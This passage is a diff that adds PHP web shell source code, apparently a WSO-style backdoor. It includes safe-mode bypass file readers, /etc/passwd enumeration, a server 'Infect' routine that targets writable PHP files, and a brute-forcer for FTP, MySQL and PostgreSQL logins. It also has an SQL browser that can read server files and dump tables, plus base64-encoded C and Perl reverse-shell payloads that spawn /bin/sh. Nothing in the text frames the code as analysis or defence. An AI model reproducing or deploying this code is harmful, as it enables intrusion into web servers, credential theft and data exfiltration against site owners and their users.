+ | if(is_array($paths)&&@count($paths)) { | ||
+ | foreach($paths as $â) { | ||
+ | if(@is_dir($â)){ | ||
+ | if($path!=$â) | ||
+ | hardRecursiveGlob($â); | ||
+ | } else { | ||
+ | if(empty($_POST['p2']) || @strpos(file_get_contents($â), $_POST['p2'])!==false) | ||
+ | echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($â)."\", \"view\",\"\")'>".htmlspecialchars($â)."</a><br>"; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | if(@$_POST['p3']) | ||
+ | hardRecursiveGlob($_POST['c']); | ||
+ | echo "</div><br><h1>Search for hash:</h1><div class=content> | ||
+ | <form method='post' target='_blank' name='hf'> | ||
+ | <input type='text' name='hash' style='width:200px;'><br> | ||
+ | <input type='hidden' name='act' value='find'/> | ||
+ | <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br> | ||
+ | <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br> | ||
+ | <input type='button' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br> | ||
+ | <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br> | ||
+ | <input type='button' value='tools4noobs.com' onclick=\"document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()\"><br> | ||
+ | <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br> | ||
+ | <input type='button' value='artlebedev.ru' onclick=\"document.hf.action='https://www.artlebedev.ru/tools/decoder/';document.hf.submit()\"><br> | ||
+ | </form></div>"; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionSafeMode() { | ||
+ | $temp=''; | ||
+ | ob_start(); | ||
+ | switch($_POST['p1']) { | ||
+ | case 1: | ||
+ | $temp=@tempnam($test, 'cx'); | ||
+ | if(@copy("compress.zlib://".$_POST['p2'], $temp)){ | ||
+ | echo @file_get_contents($temp); | ||
+ | unlink($temp); | ||
+ | } else | ||
+ | echo 'Sorry... Can\'t open file'; | ||
+ | break; | ||
+ | case 2: | ||
+ | $files = glob($_POST['p2'].'*'); | ||
+ | if( is_array($files) ) | ||
+ | foreach ($files as $filename) | ||
+ | echo $filename."\n"; | ||
+ | break; | ||
+ | case 3: | ||
+ | $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); | ||
+ | curl_exec($ch); | ||
+ | break; | ||
+ | case 4: | ||
+ | ini_restore("safe_mode"); | ||
+ | ini_restore("open_basedir"); | ||
+ | include($_POST['p2']); | ||
+ | break; | ||
+ | case 5: | ||
+ | for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { | ||
+ | $uid = @posix_getpwuid($_POST['p2']); | ||
+ | if ($uid) | ||
+ | echo join(':',$uid)."\n"; | ||
+ | } | ||
+ | break; | ||
+ | case 6: | ||
+ | if(!function_exists('imap_open'))break; | ||
+ | $stream = imap_open($_POST['p2'], "", ""); | ||
+ | if ($stream == FALSE) | ||
+ | break; | ||
+ | echo imap_body($stream, 1); | ||
+ | imap_close($stream); | ||
+ | break; | ||
+ | } | ||
+ | $temp = ob_get_clean(); | ||
+ | hardHeader(); | ||
+ | echo '<h1>Safe mode bypass</h1><div class=content>'; | ||
+ | echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>'; | ||
+ | if($temp) | ||
+ | echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>'; | ||
+ | echo '</div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionLogout() { | ||
+ | setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); | ||
+ | die('bye!'); | ||
+ | } | ||
+ | function actionSelfRemove() { | ||
+ | if($_POST['p1'] == 'yes') | ||
+ | if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) | ||
+ | die('Shell has been removed'); | ||
+ | else | ||
+ | echo 'unlink error!'; | ||
+ | if($_POST['p1'] != 'yes') | ||
+ | hardHeader(); | ||
+ | echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionInfect() { | ||
+ | hardHeader(); | ||
+ | echo '<h1>Infect</h1><div class=content>'; | ||
+ | if($_POST['p1'] == 'infect') { | ||
+ | $target=$_SERVER['DOCUMENT_ROOT']; | ||
+ | function ListFiles($dir) { | ||
+ | if($dh = opendir($dir)) { | ||
+ | $files = Array(); | ||
+ | $inner_files = Array(); | ||
+ | while($file = readdir($dh)) { | ||
+ | if($file != "." && $file != "..") { | ||
+ | if(is_dir($dir . "/" . $file)) { | ||
+ | $inner_files = ListFiles($dir . "/" . $file); | ||
+ | if(is_array($inner_files)) $files = array_merge($files, $inner_files); | ||
+ | } else { | ||
+ | array_push($files, $dir . "/" . $file); | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | closedir($dh); | ||
+ | return $files; | ||
+ | } | ||
+ | } | ||
+ | foreach (ListFiles($target) as $key=>$file){ | ||
+ | $nFile = substr($file, -4, 4); | ||
+ | if($nFile == ".php" ){ | ||
+ | if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){ | ||
+ | echo "$file<br>"; | ||
+ | $i++; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | echo "<font color=red size=14>$i</font>"; | ||
+ | }else{ | ||
+ | echo "<form method=post><input type=submit value=Infect name=infet></form>"; | ||
+ | echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>'; | ||
+ | } | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionBruteforce() { | ||
+ | hardHeader(); | ||
+ | if( isset($_POST['proto']) ) { | ||
+ | echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>'; | ||
+ | if( $_POST['proto'] == 'ftp' ) { | ||
+ | function bruteForce($ip,$port,$login,$pass) { | ||
+ | $fp = @ftp_connect($ip, $port?$port:21); | ||
+ | if(!$fp) return false; | ||
+ | $res = @ftp_login($fp, $login, $pass); | ||
+ | @ftp_close($fp); | ||
+ | return $res; | ||
+ | } | ||
+ | } elseif( $_POST['proto'] == 'mysql' ) { | ||
+ | function bruteForce($ip,$port,$login,$pass) { | ||
+ | $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); | ||
+ | @mysql_close($res); | ||
+ | return $res; | ||
+ | } | ||
+ | } elseif( $_POST['proto'] == 'pgsql' ) { | ||
+ | function bruteForce($ip,$port,$login,$pass) { | ||
+ | $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; | ||
+ | $res = @pg_connect($str); | ||
+ | @pg_close($res); | ||
+ | return $res; | ||
+ | } | ||
+ | } | ||
+ | $success = 0; | ||
+ | $attempts = 0; | ||
+ | $server = explode(":", $_POST['server']); | ||
+ | if($_POST['type'] == 1) { | ||
+ | $temp = @file('/etc/passwd'); | ||
+ | if( is_array($temp) ) | ||
+ | foreach($temp as $line) { | ||
+ | $line = explode(":", $line); | ||
+ | ++$attempts; | ||
+ | if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { | ||
+ | $success++; | ||
+ | echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>'; | ||
+ | } | ||
+ | if(@$_POST['reverse']) { | ||
+ | $tmp = ""; | ||
+ | for($i=strlen($line[0])-1; $i>=0; --$i) | ||
+ | $tmp .= $line[0][$i]; | ||
+ | ++$attempts; | ||
+ | if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { | ||
+ | $success++; | ||
+ | echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp); | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } elseif($_POST['type'] == 2) { | ||
+ | $temp = @file($_POST['dict']); | ||
+ | if( is_array($temp) ) | ||
+ | foreach($temp as $line) { | ||
+ | $line = trim($line); | ||
+ | ++$attempts; | ||
+ | if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { | ||
+ | $success++; | ||
+ | echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>'; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; | ||
+ | } | ||
+ | echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' | ||
+ | .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' | ||
+ | .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' | ||
+ | .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' | ||
+ | .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' | ||
+ | .'<input type=hidden name=ne value="">' | ||
+ | .'<span>Server:port</span></td>' | ||
+ | .'<td><input type=text name=server value="127.0.0.1"></td></tr>' | ||
+ | .'<tr><td><span>Brute type</span></td>' | ||
+ | .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' | ||
+ | .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' | ||
+ | .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' | ||
+ | .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' | ||
+ | .'<td><input type=text name=login value="root"></td></tr>' | ||
+ | .'<tr><td><span>Dictionary</span></td>' | ||
+ | .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>' | ||
+ | .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; | ||
+ | echo '</div><br>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionSql() { | ||
+ | class DbClass { | ||
+ | var $type; | ||
+ | var $link; | ||
+ | var $res; | ||
+ | function DbClass($type) { | ||
+ | $this->type = $type; | ||
+ | } | ||
+ | function connect($host, $user, $pass, $dbname){ | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | $host = explode(':', $host); | ||
+ | if(!$host[1]) $host[1]=5432; | ||
+ | if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function selectdb($db) { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | if (@mysql_select_db($db))return true; | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function query($str) { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | return $this->res = @mysql_query($str); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | return $this->res = @pg_query($this->link,$str); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function fetch() { | ||
+ | $res = func_num_args()?func_get_arg(0):$this->res; | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | return @mysql_fetch_assoc($res); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | return @pg_fetch_assoc($res); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function listDbs() { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | return $this->query("SHOW databases"); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function listTables() { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | return $this->res = $this->query('SHOW TABLES'); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function error() { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | return @mysql_error(); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | return @pg_last_error(); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function setCharset($str) { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | if(function_exists('mysql_set_charset')) | ||
+ | return @mysql_set_charset($str, $this->link); | ||
+ | else | ||
+ | $this->query('SET CHARSET '.$str); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | return @pg_set_client_encoding($this->link, $str); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function loadFile($str) { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;"); | ||
+ | $r=array(); | ||
+ | while($i=$this->fetch()) | ||
+ | $r[] = $i['file']; | ||
+ | $this->query('drop table hard2'); | ||
+ | return array('file'=>implode("\n",$r)); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function dump($table, $fp = false) { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); | ||
+ | $create = mysql_fetch_array($res); | ||
+ | $sql = $create[1].";\n"; | ||
+ | if($fp) fwrite($fp, $sql); else echo($sql); | ||
+ | $this->query('SELECT * FROM `'.$table.'`'); | ||
+ | $i = 0; | ||
+ | $head = true; | ||
+ | while($â = $this->fetch()) { | ||
+ | $sql = ''; | ||
+ | if($i % 1000 == 0) { | ||
+ | $head = true; | ||
+ | $sql = ";\n\n"; | ||
+ | } | ||
+ | $columns = array(); | ||
+ | foreach($â as $k=>$v) { | ||
+ | if($v === null) | ||
+ | $â[$k] = "NULL"; | ||
+ | elseif(is_int($v)) | ||
+ | $â[$k] = $v; | ||
+ | else | ||
+ | $â[$k] = "'".@mysql_real_escape_string($v)."'"; | ||
+ | $columns[] = "`".$k."`"; | ||
+ | } | ||
+ | if($head) { | ||
+ | $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $â).')'; | ||
+ | $head = false; | ||
+ | } else | ||
+ | $sql .= "\n\t,(".implode(", ", $â).')'; | ||
+ | if($fp) fwrite($fp, $sql); else echo($sql); | ||
+ | $i++; | ||
+ | } | ||
+ | if(!$head) | ||
+ | if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | $this->query('SELECT * FROM '.$table); | ||
+ | while($â = $this->fetch()) { | ||
+ | $columns = array(); | ||
+ | foreach($â as $k=>$v) { | ||
+ | $â[$k] = "'".addslashes($v)."'"; | ||
+ | $columns[] = $k; | ||
+ | } | ||
+ | $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $â).');'."\n"; | ||
+ | if($fp) fwrite($fp, $sql); else echo($sql); | ||
+ | } | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | }; | ||
+ | $db = new DbClass($_POST['type']); | ||
+ | if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) { | ||
+ | $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); | ||
+ | $db->selectdb($_POST['sql_base']); | ||
+ | switch($_POST['charset']) { | ||
+ | case "Windows-1251": $db->setCharset('cp1251'); break; | ||
+ | case "UTF-8": $db->setCharset('utf8'); break; | ||
+ | case "KOI8-R": $db->setCharset('koi8r'); break; | ||
+ | case "KOI8-U": $db->setCharset('koi8u'); break; | ||
+ | case "cp866": $db->setCharset('cp866'); break; | ||
+ | } | ||
+ | if(empty($_POST['file'])) { | ||
+ | ob_start("ob_gzhandler", 4096); | ||
+ | header("Content-Disposition: attachment; filename=dump.sql"); | ||
+ | header("Content-Type: text/plain"); | ||
+ | foreach($_POST['tbl'] as $v) | ||
+ | $db->dump($v); | ||
+ | exit; | ||
+ | } elseif($fp = @fopen($_POST['file'], 'w')) { | ||
+ | foreach($_POST['tbl'] as $v) | ||
+ | $db->dump($v, $fp); | ||
+ | fclose($fp); | ||
+ | unset($_POST['p2']); | ||
+ | } else | ||
+ | die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); | ||
+ | } | ||
+ | hardHeader(); | ||
+ | echo " | ||
+ | <h1>Sql browser</h1><div class=content> | ||
+ | <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr> | ||
+ | <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr> | ||
+ | <input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'> | ||
+ | <td><select name='type'><option value='mysql' "; | ||
+ | if(@$_POST['type']=='mysql')echo 'selected'; | ||
+ | echo ">MySql</option><option value='pgsql' "; | ||
+ | if(@$_POST['type']=='pgsql')echo 'selected'; | ||
+ | echo ">PostgreSql</option></select></td> | ||
+ | <td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td> | ||
+ | <td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td> | ||
+ | <td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>"; | ||
+ | $tmp = "<input type=text name=sql_base value=''>"; | ||
+ | if(isset($_POST['sql_host'])){ | ||
+ | if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { | ||
+ | switch($_POST['charset']) { | ||
+ | case "Windows-1251": $db->setCharset('cp1251'); break; | ||
+ | case "UTF-8": $db->setCharset('utf8'); break; | ||
+ | case "KOI8-R": $db->setCharset('koi8r'); break; | ||
+ | case "KOI8-U": $db->setCharset('koi8u'); break; | ||
+ | case "cp866": $db->setCharset('cp866'); break; | ||
+ | } | ||
+ | $db->listDbs(); | ||
+ | echo "<select name=sql_base><option value=''></option>"; | ||
+ | while($â = $db->fetch()) { | ||
+ | list($key, $value) = each($â); | ||
+ | echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; | ||
+ | } | ||
+ | echo '</select>'; | ||
+ | } | ||
+ | else echo $tmp; | ||
+ | }else | ||
+ | echo $tmp; | ||
+ | echo "</td> | ||
+ | <td><input type=submit value='>>' onclick='fs(d.sf);'></td> | ||
+ | <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td> | ||
+ | </tr> | ||
+ | </table> | ||
+ | <script> | ||
+ | s_db='".@addslashes($_POST['sql_base'])."'; | ||
+ | function fs(f) { | ||
+ | if(f.sql_base.value!=s_db) { f.onsubmit = function() {}; | ||
+ | if(f.p1) f.p1.value=''; | ||
+ | if(f.p2) f.p2.value=''; | ||
+ | if(f.p3) f.p3.value=''; | ||
+ | } | ||
+ | } | ||
+ | function st(t,l) { | ||
+ | d.sf.p1.value = 'select'; | ||
+ | d.sf.p2.value = t; | ||
+ | if(l && d.sf.p3) d.sf.p3.value = l; | ||
+ | d.sf.submit(); | ||
+ | } | ||
+ | function is() { | ||
+ | for(i=0;i<d.sf.elements['tbl[]'].length;++i) | ||
+ | d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked; | ||
+ | } | ||
+ | </script>"; | ||
+ | if(isset($db) && $db->link){ | ||
+ | echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; | ||
+ | if(!empty($_POST['sql_base'])){ | ||
+ | $db->selectdb($_POST['sql_base']); | ||
+ | echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; | ||
+ | $tbls_res = $db->listTables(); | ||
+ | while($â = $db->fetch($tbls_res)) { | ||
+ | list($key, $value) = each($â); | ||
+ | if(!empty($_POST['sql_count'])) | ||
+ | $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); | ||
+ | $value = htmlspecialchars($value); | ||
+ | echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>"; | ||
+ | } | ||
+ | echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; | ||
+ | if(@$_POST['p1'] == 'select') { | ||
+ | $_POST['p1'] = 'query'; | ||
+ | $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; | ||
+ | $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); | ||
+ | $num = $db->fetch(); | ||
+ | $pages = ceil($num['n'] / 30); | ||
+ | echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">"; | ||
+ | echo " of $pages"; | ||
+ | if($_POST['p3'] > 1) | ||
+ | echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>"; | ||
+ | if($_POST['p3'] < $pages) | ||
+ | echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>"; | ||
+ | $_POST['p3']--; | ||
+ | if($_POST['type']=='pgsql') | ||
+ | $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); | ||
+ | else | ||
+ | $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; | ||
+ | echo "<br><br>"; | ||
+ | } | ||
+ | if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { | ||
+ | $db->query(@$_POST['p2']); | ||
+ | if($db->res !== false) { | ||
+ | $title = false; | ||
+ | echo '<table width=100% cellspacing=1 cellpadding=2 class=main>'; | ||
+ | $line = 1; | ||
+ | while($â = $db->fetch()) { | ||
+ | if(!$title) { | ||
+ | echo '<tr>'; | ||
+ | foreach($â as $key => $value) | ||
+ | echo '<th>'.$key.'</th>'; | ||
+ | reset($â); | ||
+ | $title=true; | ||
+ | echo '</tr><tr>'; | ||
+ | $line = 2; | ||
+ | } | ||
+ | echo '<tr class="l'.$line.'">'; | ||
+ | $line = $line==1?2:1; | ||
+ | foreach($â as $key => $value) { | ||
+ | if($value == null) | ||
+ | echo '<td><i>null</i></td>'; | ||
+ | else | ||
+ | echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; | ||
+ | } | ||
+ | echo '</tr>'; | ||
+ | } | ||
+ | echo '</table>'; | ||
+ | } else { | ||
+ | echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; | ||
+ | } | ||
+ | } | ||
+ | echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; | ||
+ | if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) | ||
+ | echo htmlspecialchars($_POST['p2']); | ||
+ | echo "</textarea><br/><input type=submit value='Execute'>"; | ||
+ | echo "</td></tr>"; | ||
+ | } | ||
+ | echo "</table></form><br/>"; | ||
+ | if($_POST['type']=='mysql') { | ||
+ | $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); | ||
+ | if($db->fetch()) | ||
+ | echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; | ||
+ | } | ||
+ | if(@$_POST['p1'] == 'loadfile') { | ||
+ | $file = $db->loadFile($_POST['p2']); | ||
+ | echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>'; | ||
+ | } | ||
+ | } else { | ||
+ | echo htmlspecialchars($db->error()); | ||
+ | } | ||
+ | echo '</div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionNetwork() { | ||
+ | hardHeader(); | ||
+ | $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; | ||
+ | $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; | ||
